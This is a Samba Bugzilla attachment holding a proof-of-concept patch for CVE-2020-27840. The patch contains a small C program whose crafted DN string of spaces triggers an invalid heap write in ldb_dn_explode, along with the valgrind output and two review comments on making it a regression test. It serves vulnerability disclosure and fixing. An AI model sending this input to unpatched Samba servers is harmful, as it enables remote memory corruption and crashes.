The Samba-Bugzilla – Attachment 16365 Details for
Bug 14595
CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs
[patch]
proof of concept
0001-POC-crash-for-ldb_dn_expode.patch (text/plain), 2.83 KB, created by
Douglas Bagnall
on 2020-12-11 03:42:08 UTC
>From c7f8bac84bd8865c4a3b210e881310e547321e0d Mon Sep 17 00:00:00 2001 >From: Douglas Bagnall <douglas.bagnall@catalyst.net.nz> >Date: Fri, 11 Dec 2020 16:30:35 +1300 >Subject: [PATCH 1/2] POC crash for ldb_dn_expode > >$ make -j >$ valgrind bin/default/lib/ldb/explode_ldb_dn_explode >==1732366== Memcheck, a memory error detector >==1732366== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. >==1732366== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info >==1732366== Command: bin/default/lib/ldb/explode_ldb_dn_explode >==1732366== >==1732366== Invalid write of size 1 >==1732366== at 0x48667CE: ldb_dn_explode (ldb_dn.c:722) >==1732366== by 0x48669DA: ldb_dn_validate (ldb_dn.c:754) >==1732366== by 0x1091E0: main (explode_ldb_dn_explode.c:12) >==1732366== Address 0x4c157a7 is 9 bytes before a block of size 211 alloc'd >==1732366== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >==1732366== by 0x4AD2365: __talloc_with_prefix (talloc.c:783) >==1732366== by 0x4AD24FF: __talloc (talloc.c:825) >==1732366== by 0x4AD299C: _talloc_named_const (talloc.c:982) >==1732366== by 0x4AD6B26: _talloc_array (talloc.c:2763) >==1732366== by 0x4865B71: ldb_dn_explode (ldb_dn.c:343) >==1732366== by 0x48669DA: ldb_dn_validate (ldb_dn.c:754) >==1732366== by 0x1091E0: main (explode_ldb_dn_explode.c:12) >==1732366== > > >Signed-off-by: Douglas Bagnall <douglas.bagnall@catalyst.net.nz> >--- > lib/ldb/tests/explode_ldb_dn_explode.c | 14 ++++++++++++++ > lib/ldb/wscript | 5 +++++ > 2 files changed, 19 insertions(+) > create mode 100644 lib/ldb/tests/explode_ldb_dn_explode.c > >diff --git a/lib/ldb/tests/explode_ldb_dn_explode.c b/lib/ldb/tests/explode_ldb_dn_explode.c >new file mode 100644 >index 00000000000..51d9ba36a2a >--- /dev/null >+++ b/lib/ldb/tests/explode_ldb_dn_explode.c 
>@@ -0,0 +1,14 @@ >+#include "includes.h" >+#include "ldb.h" >+ >+int main(int argc, char * argv[]) >+{ >+ const char *str_dn = ("a=b " >+ " " >+ " ,c= "); >+ >+ struct ldb_context *ldb = ldb_init(NULL, NULL); >+ struct ldb_dn *dn = ldb_dn_new(ldb, ldb, str_dn); >+ ldb_dn_validate(dn); >+ return 0; >+} >diff --git a/lib/ldb/wscript b/lib/ldb/wscript >index f374f64aeab..027d55c187e 100644 >--- a/lib/ldb/wscript >+++ b/lib/ldb/wscript >@@ -497,6 +497,11 @@ def build(bld): > deps='cmocka ldb', > install=False) > >+ bld.SAMBA_BINARY('explode_ldb_dn_explode', >+ source='tests/explode_ldb_dn_explode.c', >+ deps='ldb', >+ install=False) >+ > bld.SAMBA_BINARY('ldb_match_test', > source='tests/ldb_match_test.c', > deps='cmocka ldb', >-- >2.25.1 >
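Review bot: in main() of lib/ldb/tests/explode_ldb_dn_explode.c the pointers returned by ldb_init() and ldb_dn_new() are used without a NULL check, and the result of ldb_dn_validate(dn) is thrown away, so the program returns 0 on every path and the defect is only visible when it is run under valgrind or a sanitizer, as in the commit message. If this is to be kept as a regression test rather than a one-off reproducer, check both pointers, return non-zero on failure, make the exit status depend on the ldb_dn_validate() result, and talloc_free(ldb) before returning so leak checkers stay quiet. A one-line comment above str_dn saying which property of the string (the run of spaces after "a=b" and before ",c=") reaches the invalid write at ldb_dn.c:722 would also help, since whitespace-only differences in a string literal are easy to lose in later edits.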
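Review bot: the bld.SAMBA_BINARY('explode_ldb_dn_explode', ...) entry added to build() in lib/ldb/wscript only builds the binary with deps='ldb' and install=False; nothing in this hunk runs it, so once the parser is fixed a regression would not be caught automatically. The neighbouring entries use deps='cmocka ldb', so consider turning the reproducer into a cmocka test that asserts on the ldb_dn_validate() result and is run with the other ldb tests, or note in the commit message that this target is a manual proof of concept and not meant to be merged.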